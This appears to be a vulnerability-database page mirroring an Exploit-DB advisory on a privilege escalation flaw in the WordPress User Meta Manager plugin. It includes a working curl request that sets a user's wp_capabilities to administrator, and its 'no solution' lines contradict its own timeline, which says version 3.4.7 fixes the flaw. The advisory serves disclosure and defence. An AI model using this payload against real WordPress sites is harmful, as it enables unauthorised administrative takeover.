header-logo
Suggest Exploit
vendor:
User Meta Manager
by:
Panagiotis Vagenas
7,5
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: User Meta Manager
Affected Version From: 3.4.6
Affected Version To: 3.4.7
Patch Exists: YES
Related CWE: N/A
CPE: a:jasonlau:user_meta_manager:3.4.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress 4.4.1
2015

WordPress User Meta Manager Plugin [Privilege Escalation]

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege escalation vulnerability. A registered user can modify the meta information of any registered user, including himself. This way he can modify `wp_capabilities` meta to escalate his account to a full privileged administrative account.

Mitigation:

No official solution yet exists.
Source

Exploit-DB raw data:

* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
================================================================================

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege 
escalation vulnerability. A registered user can modify the meta information of 
any registered user, including himself. This way he can modify `wp_capabilities`
meta to escalate his account to a full privileged administrative account.

PoC
================================================================================


curl -c ${USER_COOKIES} \
     -d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
     &umm_meta_key[]=wp_capabilities" \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"


Timeline
================================================================================

2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7

Solution
================================================================================
  
No official solution yet exists.

Navigation

Suggest Exploit

Services By CQR